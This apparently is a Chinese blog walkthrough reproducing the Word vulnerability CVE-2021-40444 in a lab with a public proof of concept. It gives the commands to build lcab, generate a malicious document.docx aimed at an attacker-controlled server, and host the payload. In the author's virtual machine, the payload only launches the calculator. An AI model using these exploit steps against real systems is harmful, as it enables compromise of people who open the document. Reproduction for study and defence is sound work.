本文的標題是《2021年的word文檔還有漏洞,Office 1day CVE-2021-40444復現》來源于:由作者:陳鵬羽采編而成,主要講述了項目地址在https://github.com/lo
項目地址在https://github.com/lockedbyte/CVE-2021-40444。先下載到kali里。
由于此項目必須使用lcab,所以我們先在kail里安裝一下。
wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz
tar zxvf lcab_1.0b12.orig.tar.gz
cd lcab-1.0b12
./configure
make
sudo make install
which lcab
# 查看幫助信息
lcab –help
進入下載后的CVE-2021-40444目錄里,執行:
python3 exploit.py generate test/calc.dll http://<SRV IP>:3333
看見“You can execute now the server and then send document.docx to target” 說明就可以了。
然后用python開一個http服務,端口用剛剛設置的3333 或者自己設置的端口號。
sudo python3 exploit.py host 3333
把CVE-2021-40444目錄里的子目錄out下的document.docx文件copy到虛擬機中執行。
word打開后,可以看見這里在下載我們kali上的html文件。
html又會下載calc.cab 文件執行其中的命令,最后彈出計算器。
服務端顯示的結果:
本文原作者為陳鵬羽,轉載請注明:出處!如該文有不妥之處,請聯系站長刪除,謝謝合作~
原創文章,作者:陳鵬羽,如若轉載,請注明出處:http://www.uuuxu.com/20220512315602.html
相關推薦
-
女孩子的微信頭像(女孩子的微信頭像用的是卡通的意義)
前沿拓展: 女孩子的微信頭像 【**照】 在現在p圖工具如此厲害的情況下,**成了女生的娛樂, 只要長的不是看不下去,拍出來的照片都會很好看。 然而也不要認為丑女人不敢秀, 我認識…
-
OneNote教師教學指導網站全面升級(onenote教育賬號登陸提示我們無法連接你)
微軟在去年推出了OneNote教師教學指導網站,主要是對學校
-
注冊outlook.ie微軟郵箱圖文教程(注冊outlook郵箱)
還在用大眾型的Outlook.com微軟賬戶嗎?你是否喜愛I
-
微信怎么看朋友圈(微信怎么看朋友圈評論記錄)
前沿拓展: 微信怎么看朋友圈 微信中有很多我們生活中的朋友、家人,我們可以發朋友圈向這些人展示我們的生活狀態、心情感悟等。那微信怎么看自己發的朋友圈? 微信怎么看自己發的朋友圈? …
-
微信頭像男王者榮耀(微信頭像男王者榮耀韓信)
前沿拓展: 微信頭像男王者榮耀 由于網絡原因,微信頭像換了之后,游戲的頭像更新延遲,可更換個速度快的網絡即可;游戲內存未清,將王者榮耀游戲中的緩存清理,清理后關閉游戲,重新打開即可…
-
Word2013中快速切換和新建文檔窗口**作方法(word2013產品密鑰)
在同時編輯多個文檔時,往往需要在不同的文檔間進行切換,以對不
-
微信需要解封(微信需要解封但是沒有好友怎么辦)
前沿拓展: 微信需要解封 這個如果是你的微信的話,如果需要微信解封,就平常跟你說話比較親近的人,然后給你發就是它那個驗證碼就可以了解封了,然后你可以不選擇人臉識別這個的,現在有好幾…
-
我想換個微信頭像(我想換個微信頭像帶自己姓的)
前沿拓展: 我想換個微信頭像 步驟如下: 1、首先打開微信個人主頁面。 2、點擊頁面最右上角的圖標,再點擊自己的微信頭像。 3、在打開的頁面里,點擊“頭像”兩字。 4、此時,彈出一…
-
怎樣恢復微信刪除的聊天記錄(怎樣恢復微信刪除的聊天記錄和圖片)
前沿拓展: 怎樣恢復微信刪除的聊天記錄 恢復微信刪除的聊天記錄蘋果的方法有: 第一步:首先將蘋果中的應用微信打開。 第二步:來到手機微信的首頁,點擊右上角的“+”點擊添加好友**作…
-
微信頭像女生萌萌噠(可愛頭像微信女生萌萌噠)
前沿拓展: 微信頭像女生萌萌噠 和男朋友分手十幾天了,他的微信頭像包括網名也換了3次。現在發現他又換回之前的網名,這個沒有必要糾結,二者沒有必然的關系,只是他的一個無心之舉,并不意…